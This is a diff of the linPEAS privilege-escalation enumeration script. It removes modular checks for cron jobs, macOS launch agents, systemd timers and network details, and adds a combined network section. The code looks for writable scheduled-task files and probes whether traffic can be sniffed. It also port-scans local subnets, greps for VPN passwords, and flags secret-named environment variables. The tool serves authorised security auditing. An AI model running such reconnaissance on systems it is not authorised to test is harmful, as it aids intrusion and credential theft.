-  #    [ "$username" = "$USER" ] && continue
-      
-  #    echo "Found crontab for user: $username"
-  #    while IFS= read -r line || [ -n "$line" ]; do
-  #      case "$line" in
-  #        \#*|"") continue ;;
-  #      esac
-  #      cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
-  #      [ -z "$cmd" ] && continue
-  #      check_privesc_vectors "$cmd" "$user_crontab"
-  #    done < "$user_crontab"
-  #  done
-  #else
-  #  echo_not_found "crontab"
-  #fi
-
-  # Check for writable cron directories
-  echo "Checking cron directories..."
-  for cron_dir in /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly /var/spool/cron/crontabs /usr/lib/cron/tabs /private/var/at/jobs /var/at/tabs /etc/periodic; do
-    [ ! -d "$cron_dir" ] && continue
-    if [ -w "$cron_dir" ]; then
-      echo "Writable cron directory: $cron_dir"
-    fi
-  done
-
-  # Check for at jobs
-  #if command -v atq >/dev/null 2>&1; then
-  #  echo "Checking at jobs..."
-  #  atq 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
-  #    [ -z "$line" ] && continue
-  #    job_id=$(echo "$line" | awk '{print $1}')
-  #    [ -z "$job_id" ] && continue
-  #    at -c "$job_id" 2>/dev/null | while IFS= read -r cmd || [ -n "$cmd" ]; do
-  #      case "$cmd" in
-  #        \#*|"") continue ;;
-  #      esac
-  #      check_privesc_vectors "$cmd" "at job $job_id"
-  #    done
-  #  done
-  #fi
-
-  # Check for incron jobs
-  #if command -v incrontab >/dev/null 2>&1; then
-  #  echo "Checking incron jobs..."
-  #  incrontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
-  #    case "$line" in
-  #      \#*|"") continue ;;
-  #    esac
-  #    cmd=$(echo "$line" | awk '{print $3}')
-  #    [ -z "$cmd" ] && continue
-  #    check_privesc_vectors "$cmd" "incron job"
-  #  done
-  #fi
-else
-  print_2title "Cron jobs"
-  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
-  find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
-fi
-echo ""
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/8_Macos_launch_agents_daemons.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/8_Macos_launch_agents_daemons.sh
@ -1,169 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Third party LaunchAgents & LaunchDemons
-# ID: PR_Macos_launch_agents_daemons
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Third party LaunchAgents & LaunchDemons and privilege escalation vectors
-# License: GNU GPL
-# Version: 1.1
-# Functions Used: print_2title, print_info
-# Global Variables: $MACPEAS, $SEARCH_IN_FOLDER
-# Initial Functions:
-# Generated Global Variables: $program, $plist_content, $binary_path, $periodic_dir, $workdir, $startup_dir, $line, $emond_script, $startup_item, $finding, $location, $findings, $login_item, $plist, $periodic_script, $plist_dir
-# Fat linpeas: 0
-# Small linpeas: 0
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  if [ "$MACPEAS" ]; then
-    print_2title "Third party LaunchAgents & LaunchDemons"
-    print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#launchd"
-    print_info "Checking for privilege escalation vectors in LaunchAgents & LaunchDaemons:"
-    print_info "1. Writable plist files"
-    print_info "2. Writable program binaries"
-    print_info "3. Environment variables with sensitive data"
-    print_info "4. Unsafe program arguments"
-    print_info "5. RunAtLoad with elevated privileges"
-    print_info "6. KeepAlive with elevated privileges"
-
-    # Function to check plist content for privilege escalation vectors
-    check_plist_content() {
-      local plist="$1"
-      local findings=""
-      
-      # Check for environment variables
-      if defaults read "$plist" EnvironmentVariables 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then
-        findings="${findings}ENV_VARS: Contains sensitive environment variables\n"
-      fi
-
-      # Check for RunAtLoad with elevated privileges
-      if defaults read "$plist" RunAtLoad 2>/dev/null | grep -q "true"; then
-        if [ -w "$plist" ]; then
-          findings="${findings}RUN_AT_LOAD: Runs at load and plist is writable\n"
-        fi
-      fi
-
-      # Check for KeepAlive with elevated privileges
-      if defaults read "$plist" KeepAlive 2>/dev/null | grep -q "true"; then
-        if [ -w "$plist" ]; then
-          findings="${findings}KEEP_ALIVE: Keeps running and plist is writable\n"
-        fi
-      fi
-
-      # Check for unsafe program arguments
-      if defaults read "$plist" ProgramArguments 2>/dev/null | grep -qE '(sudo|su|chmod|chown|chroot|mount)'; then
-        findings="${findings}UNSAFE_ARGS: Uses potentially dangerous program arguments\n"
-      fi
-
-      # Check for writable working directory
-      if defaults read "$plist" WorkingDirectory 2>/dev/null | grep -qE '^/'; then
-        local workdir=$(defaults read "$plist" WorkingDirectory 2>/dev/null)
-        if [ -w "$workdir" ]; then
-          findings="${findings}WRITABLE_WORKDIR: Working directory is writable\n"
-        fi
-      fi
-
-      # If any findings, print them
-      if [ -n "$findings" ]; then
-        echo "Potential privilege escalation in: $plist"
-        echo "$findings" | while read -r finding; do
-          [ -n "$finding" ] && echo "  └─ $finding"
-        done
-      fi
-    }
-
-    # Check system and user LaunchAgents & LaunchDaemons
-    for plist_dir in /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/; do
-      [ ! -d "$plist_dir" ] && continue
-      
-      echo "Checking $plist_dir..."
-      find "$plist_dir" -name "*.plist" 2>/dev/null | while read -r plist; do
-        # Check if plist is writable
-        if [ -w "$plist" ]; then
-          echo "Writable plist: $plist" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-        fi
-
-        # Get program path
-        program=""
-        program=$(defaults read "$plist" Program 2>/dev/null)
-        if ! [ "$program" ]; then
-          program=$(defaults read "$plist" ProgramArguments 2>/dev/null | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
-        fi
-
-        # Check if program is writable
-        if [ -n "$program" ] && [ -w "$program" ]; then
-          echo "Writable program: $program" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-          ls -l "$program" 2>/dev/null
-        fi
-
-        # Check plist content for privilege escalation vectors
-        check_plist_content "$plist"
-      done
-    done
-    echo ""
-
-    print_2title "StartupItems"
-    print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items"
-    for startup_dir in /Library/StartupItems/ /System/Library/StartupItems/; do
-      [ ! -d "$startup_dir" ] && continue
-      echo "Checking $startup_dir..."
-      find "$startup_dir" -type f -executable 2>/dev/null | while read -r startup_item; do
-        if [ -w "$startup_item" ]; then
-          echo "Writable startup item: $startup_item" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-          ls -l "$startup_item" 2>/dev/null
-        fi
-      done
-    done
-    echo ""
-
-    print_2title "Login Items"
-    print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#startup-items"
-    osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null | tr ", " "\n" | while read -r login_item; do
-      if [ -n "$login_item" ]; then
-        # Try to find the actual binary
-        binary_path=$(mdfind "kMDItemDisplayName == '$login_item'" 2>/dev/null | head -n 1)
-        if [ -n "$binary_path" ] && [ -w "$binary_path" ]; then
-          echo "Writable login item binary: $binary_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-          ls -l "$binary_path" 2>/dev/null
-        fi
-      fi
-    done
-    echo ""
-
-    print_2title "SPStartupItemDataType"
-    system_profiler SPStartupItemDataType 2>/dev/null | while read -r line; do
-      if echo "$line" | grep -q "Location:"; then
-        location=$(echo "$line" | cut -d: -f2- | xargs)
-        if [ -w "$location" ]; then
-          echo "Writable startup item location: $location" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-          ls -l "$location" 2>/dev/null
-        fi
-      fi
-    done
-    echo ""
-
-    print_2title "Emond scripts"
-    print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-auto-start-locations.html#emond"
-    if [ -d "/private/var/db/emondClients" ]; then
-      find "/private/var/db/emondClients" -type f 2>/dev/null | while read -r emond_script; do
-        if [ -w "$emond_script" ]; then
-          echo "Writable emond script: $emond_script" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-          ls -l "$emond_script" 2>/dev/null
-        fi
-      done
-    fi
-    echo ""
-
-    print_2title "Periodic tasks"
-    print_info "Checking periodic tasks for privilege escalation vectors"
-    for periodic_dir in /etc/periodic/daily /etc/periodic/weekly /etc/periodic/monthly; do
-      [ ! -d "$periodic_dir" ] && continue
-      echo "Checking $periodic_dir..."
-      find "$periodic_dir" -type f -executable 2>/dev/null | while read -r periodic_script; do
-        if [ -w "$periodic_script" ]; then
-          echo "Writable periodic script: $periodic_script" | sed -${E} "s,.*,${SED_RED_YELLOW},"
-          ls -l "$periodic_script" 2>/dev/null
-        fi
-      done
-    done
-    echo ""
-  fi
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/9_System_timers.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/9_System_timers.sh
@ -1,156 +0,0 @@
-# Title: Processes & Cron & Services & Timers - System Timers
-# ID: PR_System_timers
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: System Timers and privilege escalation vectors
-# License: GNU GPL
-# Version: 1.2
-# Functions Used: echo_not_found, print_2title, print_info, print_3title
-# Global Variables: $SEARCH_IN_FOLDER, $timersG
-# Initial Functions:
-# Generated Global Variables: $timer_unit, $timer_path, $timer_content, $exec_path, $timer_file, $line, $findings, $unit_path, $finding, $service_unit, $timer, $target_unit, $target_file
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "System timers"
-  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers"
-
-  # Function to check timer content for privilege escalation vectors
-  check_timer_content() {
-    local timer="$1"
-    local findings=""
-    
-    # Get the service unit this timer activates
-    local service_unit=$(systemctl show "$timer" -p Unit 2>/dev/null | cut -d= -f2)
-    if [ -n "$service_unit" ]; then
-      # Check if the service runs with elevated privileges
-      if systemctl show "$service_unit" -p User 2>/dev/null | grep -q "root"; then
-        findings="${findings}RUNS_AS_ROOT: Service runs as root\n"
-      fi
-
-      # Get the executable path
-      local exec_path=$(systemctl show "$service_unit" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1)
-      if [ -n "$exec_path" ]; then
-        if [ -w "$exec_path" ]; then
-          findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
-        fi
-        # Check for relative paths
-        case "$exec_path" in
-          /*) : ;; # Absolute path, do nothing
-          *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;;
-        esac
-      fi
-
-      # Check for unsafe configurations
-      if systemctl show "$service_unit" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then
-        findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n"
-      fi
-
-      # Check for weak permissions
-      if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
-        findings="${findings}WEAK_PERMS: Executable has 777 permissions\n"
-      fi
-    fi
-
-    # If any findings, print them
-    if [ -n "$findings" ]; then
-      echo "Potential privilege escalation in timer: $timer"
-      echo "$findings" | while read -r finding; do
-        [ -n "$finding" ] && echo "  └─ $finding"
-      done
-    fi
-  }
-
-  # Function to check timer file for privilege escalation vectors
-  check_timer_file() {
-    local timer_file="$1"
-    local findings=""
-
-    # Check if timer file is writable (following symlinks)
-    if [ -L "$timer_file" ]; then
-      # If it's a symlink, check the target file
-      local target_file=$(readlink -f "$timer_file")
-      if [ -w "$target_file" ]; then
-        findings="${findings}WRITABLE_FILE: Timer target file is writable: $target_file\n"
-      fi
-    elif [ -w "$timer_file" ]; then
-      findings="${findings}WRITABLE_FILE: Timer file is writable\n"
-    fi
-
-    # Check for weak permissions (following symlinks)
-    if [ "$(stat -L -c %a "$timer_file" 2>/dev/null)" = "777" ]; then
-      findings="${findings}WEAK_PERMS: Timer file has 777 permissions\n"
-    fi
-
-    # Check for relative paths in Unit directive
-    if grep -q "^Unit=[^/]" "$timer_file" 2>/dev/null; then
-      findings="${findings}RELATIVE_PATH: Uses relative path in Unit directive\n"
-    fi
-
-    # Check for writable executables in Unit directive (following symlinks)
-    local unit_path=$(grep -Po '^Unit=*(.*?$)' "$timer_file" 2>/dev/null | cut -d '=' -f2)
-    if [ -n "$unit_path" ]; then
-      if [ -L "$unit_path" ]; then
-        local target_unit=$(readlink -f "$unit_path")
-        if [ -w "$target_unit" ]; then
-          findings="${findings}WRITABLE_UNIT: Unit target file is writable: $target_unit\n"
-        fi
-      elif [ -w "$unit_path" ]; then
-        findings="${findings}WRITABLE_UNIT: Unit file is writable: $unit_path\n"
-      fi
-    fi
-
-    # If any findings, print them
-    if [ -n "$findings" ]; then
-      echo "Potential privilege escalation in timer file: $timer_file"
-      echo "$findings" | while read -r finding; do
-        [ -n "$finding" ] && echo "  └─ $finding"
-      done
-    fi
-  }
-
-  # List all timers and check for privilege escalation vectors
-  print_3title "Active timers:"
-  systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | while read -r line; do
-    # Extract timer unit name
-    timer_unit=$(echo "$line" | awk '{print $1}')
-    if [ -n "$timer_unit" ]; then
-      # Check if timer file is writable
-      timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
-      if [ -n "$timer_path" ]; then
-        check_timer_file "$timer_path"
-      fi
-
-      # Check timer content for privilege escalation vectors
-      check_timer_content "$timer_unit"
-
-      # Print the timer line with highlighting
-      echo "$line" | sed -${E} "s,$timersG,${SED_GREEN},"
-    fi
-  done || echo_not_found
-
-  # Check for disabled but available timers
-  print_3title "Disabled timers:"
-  systemctl list-unit-files --type=timer --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do
-    timer_unit=$(echo "$line" | awk '{print $1}')
-    if [ -n "$timer_unit" ]; then
-      timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
-      if [ -n "$timer_path" ]; then
-        check_timer_file "$timer_path"
-      fi
-    fi
-  done || echo_not_found
-
-  # Check timer files from PSTORAGE_TIMER
-  if [ -n "$PSTORAGE_TIMER" ]; then
-    print_3title "Additional timer files:"
-    printf "%s\n" "$PSTORAGE_TIMER" | while read -r timer_file; do
-      if [ -n "$timer_file" ] && [ -e "$timer_file" ]; then
-        check_timer_file "$timer_file"
-      fi
-    done
-  fi
-
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/5_network_information.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information.sh
@ -0,0 +1,192 @@
+###########################################
+#---------) Network Information (---------#
+###########################################
+
+if [ "$MACOS" ]; then
+  print_2title "Network Capabilities"
+  warn_exec system_profiler SPNetworkDataType
+  echo ""
+fi
+
+#-- NI) Hostname, hosts and DNS
+print_2title "Hostname, hosts and DNS"
+cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
+warn_exec dnsdomainname 2>/dev/null
+echo ""
+
+#-- NI) /etc/inetd.conf
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
+  (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
+  echo ""
+fi
+
+#-- NI) Interfaces
+print_2title "Interfaces"
+cat /etc/networks 2>/dev/null
+(ifconfig || ip a || (cat /proc/net/dev; cat /proc/net/fib_trie; cat /proc/net/fib_trie6)) 2>/dev/null
+echo ""
+
+#-- NI) Neighbours
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Networks and neighbours"
+  if [ "$MACOS" ]; then
+    netstat -rn 2>/dev/null
+  else
+    (route || ip n || cat /proc/net/route) 2>/dev/null
+  fi
+  (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
+  echo ""
+fi
+
+if [ "$MACPEAS" ]; then
+  print_2title "Firewall status"
+  warn_exec system_profiler SPFirewallDataType
+fi
+
+#-- NI) Iptables
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Iptables rules"
+  (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
+  echo ""
+fi
+
+#-- NI) Ports
+print_2title "Active Ports"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports"
+( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},g"
+echo ""
+
+#-- NI) MacOS hardware ports
+if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
+  print_2title "Hardware Ports"
+  networksetup -listallhardwareports
+  echo ""
+
+  print_2title "VLANs"
+  networksetup -listVLANs
+  echo ""
+
+  print_2title "Wifi Info"
+  networksetup -getinfo Wi-Fi
+  echo ""
+
+  print_2title "Check Enabled Proxies"
+  scutil --proxy
+  echo ""
+
+  print_2title "Wifi Proxy URL"
+  networksetup -getautoproxyurl Wi-Fi
+  echo ""
+  
+  print_2title "Wifi Web Proxy"
+  networksetup -getwebproxy Wi-Fi
+  echo ""
+
+  print_2title "Wifi FTP Proxy"
+  networksetup -getftpproxy Wi-Fi
+  echo ""
+fi
+
+#-- NI) tcpdump
+print_2title "Can I sniff with tcpdump?"
+timeout 1 tcpdump >/dev/null 2>&1
+if [ $? -eq 124 ]; then #If 124, then timed out == It worked
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sniffing"
+    echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+echo ""
+
+#-- NI) Internet access
+if [ "$AUTO_NETWORK_SCAN" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
+  print_2title "Internet Access?"
+  check_tcp_80 2>/dev/null &
+  check_tcp_443 2>/dev/null &
+  check_icmp 2>/dev/null &
+  check_dns 2>/dev/null &
+  wait
+  echo ""
+fi
+
+if [ "$AUTO_NETWORK_SCAN" ]; then
+  if ! [ "$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then
+    printf $RED"[-] $SCAN_BAN_BAD\n$NC"
+    echo "The network is not going to be scanned..."
+  
+  elif ! [ "$(command -v ifconfig)" ] && ! [ "$(command -v ip a)" ]; then
+    printf $RED"[-] No ifconfig or ip commands, cannot find local ips\n$NC"
+    echo "The network is not going to be scanned..."
+  
+  else
+    print_2title "Scanning local networks (using /24)"
+
+    if ! [ "$PING" ] && ! [ "$FPING" ]; then
+      printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
+    fi
+
+    select_nc
+    local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
+    printf "%s\n" "$local_ips" | while read local_ip; do
+      if ! [ -z "$local_ip" ]; then
+        print_3title "Discovering hosts in $local_ip/24"
+        
+        if [ "$PING" ] || [ "$FPING" ]; then
+          discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
+        fi
+        
+        discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp
+        
+        sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips
+        rm $Wfolder/.ips.tmp 2>/dev/null
+        
+        while read disc_ip; do
+          me=""
+          if [ "$disc_ip" = "$local_ip" ]; then
+            me=" (local)"
+          fi
+          
+          echo "Scanning top ports of ${disc_ip}${me}"
+          (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
+          echo ""
+        done < $Wfolder/.ips
+        
+        rm $Wfolder/.ips 2>/dev/null
+        echo ""
+      fi
+    done
+    
+    print_3title "Scanning top ports of host.docker.internal"
+    (tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null
+    echo ""
+  fi
+fi
+
+if [ "$MACOS" ]; then
+  print_2title "Any MacOS Sharing Service Enabled?"
+  rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l);
+  scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l);
+  flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l);
+  rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l);
+  rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l);
+  bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l);
+  printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
+  echo ""
+  print_2title "VPN Creds"
+  system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password"  | sed -${E} "s,Password|Authorization Name.*,${SED_RED},"
+  echo ""
+
+  if [ "$EXTRA_CHECKS" ]; then
+    print_2title "Bluetooth Info"
+    warn_exec system_profiler SPBluetoothDataType
+    echo ""
+
+    print_2title "Ethernet Info"
+    warn_exec system_profiler SPEthernetDataType
+    echo ""
+
+    print_2title "USB Info"
+    warn_exec system_profiler SPUSBDataType
+    echo ""
+  fi
+fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/10_Macos_hardware_ports.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/10_Macos_hardware_ports.sh
@ -1,40 +0,0 @@
-# Title: Network Information - MacOS hardware ports
-# ID: NT_Macos_hardware_ports
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Enumerate macOS hardware ports
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables: $EXTRA_CHECKS, $MACPEAS
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then
-  print_2title "Hardware Ports"
-  networksetup -listallhardwareports
-  echo ""
-
-  print_2title "VLANs"
-  networksetup -listVLANs
-  echo ""
-
-  print_2title "Wifi Info"
-  networksetup -getinfo Wi-Fi
-  echo ""
-
-  print_2title "Check Enabled Proxies"
-  scutil --proxy
-  echo ""
-
-  print_2title "Wifi Proxy URL"
-  networksetup -getautoproxyurl Wi-Fi
-  echo ""
-  
-  print_2title "Wifi Web Proxy"
-  networksetup -getwebproxy Wi-Fi
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/5_network_information/11_Internet_access.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/11_Internet_access.sh
@ -1,52 +0,0 @@
-# Title: Network Information - Internet access
-# ID: NT_Internet_access
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check for internet access
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_dns, check_icmp, check_tcp_443, check_tcp_443_bin, check_tcp_80, print_2title, check_external_hostname
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables: $pid4, $pid2, $pid1, $pid3, $$tcp443_bin_status, $NOT_CHECK_EXTERNAL_HOSTNAME, $TIMEOUT_INTERNET_SECONDS
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-
-print_2title "Internet Access?"
-
-TIMEOUT_INTERNET_SECONDS=5
-
-if [ "$SUPERFAST" ]; then
-  TIMEOUT_INTERNET_SECONDS=2.5
-fi
-
-
-# Run all checks in background
-check_tcp_80 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid1=$!
-check_tcp_443 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid2=$!
-check_icmp "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid3=$!
-check_dns "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid4=$!
-
-# Kill all after 10 seconds
-(sleep $(( $TIMEOUT_INTERNET_SECONDS + 1 )) && kill -9 $pid1 $pid2 $pid3 $pid4 2>/dev/null) &
-
-check_tcp_443_bin $TIMEOUT_INTERNET_SECONDS 2>/dev/null
-tcp443_bin_status=$?
-
-wait $pid1 $pid2 $pid3 $pid4 2>/dev/null
-
-
-# Wait for all to finish
-wait 2>/dev/null
-
-if [ "$tcp443_bin_status" -eq 0 ] && \
-   [ -z "$SUPERFAST" ] && [ -z "$NOT_CHECK_EXTERNAL_HOSTNAME" ]; then
-  echo ""
-  print_2title "Is hostname malicious or leaked?"
-  print_info "This will check the public IP and hostname in known malicious lists and leaks to find any relevant information about the host."
-  check_external_hostname 2>/dev/null
-fi
-
-echo ""
--- a/linPEAS/builder/linpeas_parts/5_network_information/1_Network_interfaces.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/1_Network_interfaces.sh
@ -1,76 +0,0 @@
-# Title: Network Information - Network interfaces
-# ID: NT_Network_interfaces
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check network interfaces
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables: $iface, $state, $mac, $ip_file, $line
-# Fat linpeas: 0
-# Small linpeas: 1
-
-# Function to parse network interfaces from /proc/net/dev and other sources
-parse_network_interfaces() {
-    # Try to get interfaces from /proc/net/dev
-    if [ -f "/proc/net/dev" ]; then
-        echo "Network Interfaces from /proc/net/dev:"
-        echo "----------------------------------------"
-        # Skip header lines and format output
-        grep -v "^Inter\|^ face" /proc/net/dev | while read -r line; do
-            iface=$(echo "$line" | awk -F: '{print $1}' | tr -d ' ')
-            if [ -n "$iface" ]; then
-                echo "Interface: $iface"
-                # Try to get IP address from /sys/class/net
-                if [ -f "/sys/class/net/$iface/address" ]; then
-                    mac=$(cat "/sys/class/net/$iface/address" 2>/dev/null)
-                    echo "  MAC: $mac"
-                fi
-                # Try to get IP from /sys/class/net
-                if [ -d "/sys/class/net/$iface/ipv4" ]; then
-                    for ip_file in /sys/class/net/$iface/ipv4/addr_*; do
-                        if [ -f "$ip_file" ]; then
-                            ip=$(cat "$ip_file" 2>/dev/null)
-                            echo "  IP: $ip"
-                        fi
-                    done
-                fi
-                # Get interface state
-                if [ -f "/sys/class/net/$iface/operstate" ]; then
-                    state=$(cat "/sys/class/net/$iface/operstate" 2>/dev/null)
-                    echo "  State: $state"
-                fi
-                echo ""
-            fi
-        done
-    fi
-
-    # Try to get additional info from /proc/net/fib_trie
-    if [ -f "/proc/net/fib_trie" ]; then
-        echo "Additional IP Information from fib_trie:"
-        echo "----------------------------------------"
-        grep -A1 "Main" /proc/net/fib_trie | grep -v "\-\-" | while read -r line; do
-            if echo "$line" | grep -q "Main"; then
-                echo "Network: $(echo "$line" | awk '{print $2}')"
-            elif echo "$line" | grep -q "/"; then
-                echo "  IP: $(echo "$line" | awk '{print $2}')"
-            fi
-        done
-    fi
-}
-
-print_2title "Interfaces"
-cat /etc/networks 2>/dev/null
-
-# Try standard tools first, then fall back to our custom function
-if command -v ifconfig >/dev/null 2>&1; then
-    ifconfig 2>/dev/null
-elif command -v ip >/dev/null 2>&1; then
-    ip a 2>/dev/null
-else
-    parse_network_interfaces
-fi
-
-echo ""
--- a/linPEAS/builder/linpeas_parts/5_network_information/2_Hostname_hosts_dns.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/2_Hostname_hosts_dns.sh
@ -1,107 +0,0 @@
-# Title: Network Information - Hostname, hosts and DNS
-# ID: NT_Hostname_hosts_dns
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Get hostname, hosts and DNS
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, warn_exec
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables: $conf, $line
-# Fat linpeas: 0
-# Small linpeas: 1
-
-# Function to get hostname using multiple methods
-get_hostname_info() {
-    print_3title "Hostname Information"
-    # Try multiple methods to get hostname
-    if command -v hostname >/dev/null 2>&1; then
-        echo "System hostname: $(hostname 2>/dev/null)"
-        echo "FQDN: $(hostname -f 2>/dev/null)"
-    else
-        # Fallback methods
-        if [ -f "/proc/sys/kernel/hostname" ]; then
-            echo "System hostname: $(cat /proc/sys/kernel/hostname 2>/dev/null)"
-        fi
-        if [ -f "/etc/hostname" ]; then
